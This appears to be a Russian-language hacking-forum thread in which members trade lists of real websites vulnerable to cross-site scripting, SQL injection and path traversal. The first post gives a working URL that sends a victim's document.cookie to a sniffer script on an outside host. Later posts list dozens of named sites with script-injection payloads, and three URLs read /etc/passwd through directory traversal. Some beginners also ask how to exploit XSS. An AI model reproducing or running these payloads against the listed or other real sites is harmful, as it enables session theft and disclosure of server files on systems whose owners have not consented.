Code: [url]http://go.mail.ru/frame.html?imgurl=http://antichat.ru/cgi-bin/s.jpg?+document.cookie&pageurl=http://antichat.ru/cgi-bin/s.jpg?+oO[/url][SNIFF.SUPER.PUPER-BOY.FORUM.ANTICHAT.RU]Oo&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3E Потом бежим на Code: [URL=http://antichat.ru/sniff/log.php]http://antichat.ru/sniff/log.php[/URL] И БАЧИМ ЧТО ПОЛУЧИЛОСЬ!
http://64.233.161.104/search?hl=ru&q=http%3A%2F%2F64.233.161.104%2Fsearch%3Fq%3Dcache%3AQxqYk3NwuhsJ%3Asunhi.us%2FphpBB2%2Fviewtopic.php%253Fp%253D6440%2526sid%253D8719e7ad6743826b960ef8d25f30cedc%2B111110A%2Fhttp%26hl%3Den%26start%3D113&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr= Гooгle Ошибка Мы сожалеем... ... но мы не можем обработать ваш запрос прямо сейчас. Компьютерный вирус или spywаre приложение пересылка нам автоматизированные запросы, и это появляется, что ваш компьютер или сеть был заражен. Мы восстановим ваш доступ как быстро как только возможно, так пробуют снова скоро. Пока суд да дело, вы, возможно, хотели бы бежать вирусный информатор или spywаre перевозчик мебели чтобы убедиться, что ваш компьютер свободен от вирусов и другого поддельного программного обеспечения. Мы извиняемся за неудобство, и надеемся, что мы увидимся снова на Google.
угу, там просто показываються серверный пути, в принципе они ничего не дают, но мало ли. Внимание! Эти сайты я опубликую в последний раз, т.к. растет недовольство против меня, я типо флудер, публикую тока из-за репцтации, сайты мои никому нах не нужны и т.д. В связи с этим, я публиковать сайты больше не буду. http://search.cstrike.ru/?search=' http://search.gamestone.ru/?search=<script>alert()</script> http://3mp3.ru/ru/search/text/?request='><script>alert()</script>&what=all http://www.mestkom.ru/asp/search.asp?action=search не фильтруються поля http://holidayclub.inprogress.ru/catalog/index.php?flet="><script>alert()</script>&Co=4&Re=460 http://hotels.wia.ru/<script>alert()</script> http://encycl.accoona.ru/?word=<script>alert()</script> http://www.bioone.org/bioone/?request=<script>alert()</script> http://www.openhardware.net/?file=<script>alert()</script> http://www.avionicsmagazine.com/cgi...e=../../../../../../../../../../../etc/passwd http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd http://alumni.calstatela.edu/docume...e=../../../../../../../../../../../etc/passwd http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script> http://www.linuxhq.com/perl-bin/search_db?q='style=background:url(javascript:alert());'&qid=4&spp=20
нашол уязвимость http://www.kalitva.ru/_/?vs=<script>javascript:alert('')</script>foto/look&id=2710&razdel=7&page=27 ps незнаю как использовать !!! =))))
Tikson Причём тут Бажные сайты от k1b0rg'a?=)) Полно инфы есть везде по ипользованию Пассивных XSS. Вот статейку почитай. _http://dante.net.ru/forum/showthread.php?t=225 Не забываем про репутацию, если помог ;-) За наводку=)))))))))
=( новодка эта уже была ..... =))) ps вот **ня полная почему у всех этот Damage Lab НЕНАВИЖУ его а именное его создателя винукса дружили дружили с ним а потом бац и все ... гад он !!! ps ps а еще есть где-нибуть почитать про это??? ps ps ps а то что я нашол это вообще считается уязвимостью ????
Еще один в коллекцию... http://www.pages.ru/search.html?tex...9%3B+%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8
http://www.atlasofscience.org/main/vacancy/search.php?subject=all&words=%3Cscript%3Ealert%28%2Flol%2F%29%3C%2Fscript%3E http://www.atlasofscience.org/main/vacancy/vacancy.php?mesid=' http://vz.ru/search/?action=search&s_string="><h1>lol</h1>
Ну вот например: http://ля-ля-тополя<script>alert()</script> И что с этим дальше можно делать? Свой скрипт вставить мона, или что-то еще? (я только начал )
vovanAdam Уже обсуждалось. Юзай поиск. А если что-то захотел спросить, то создавай отделюную тему. Твой вопрос к Бажным сайтам от Киборга не имеет ни кокого отношения!
rap.ru - <script>alert('lol')</script> v stroke poiska )) _http://delit.net/search/search_result.phtml?sstr='><script>alert(/lol/)</script>&skind=' potom kliknite na luboj ssylke, vyletaet alert _http://search.espn.go.com/keyword/searchESPNShop?searchString=XSS _http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%27lol%27%29%3C%2Fscript%3E&searchType=0
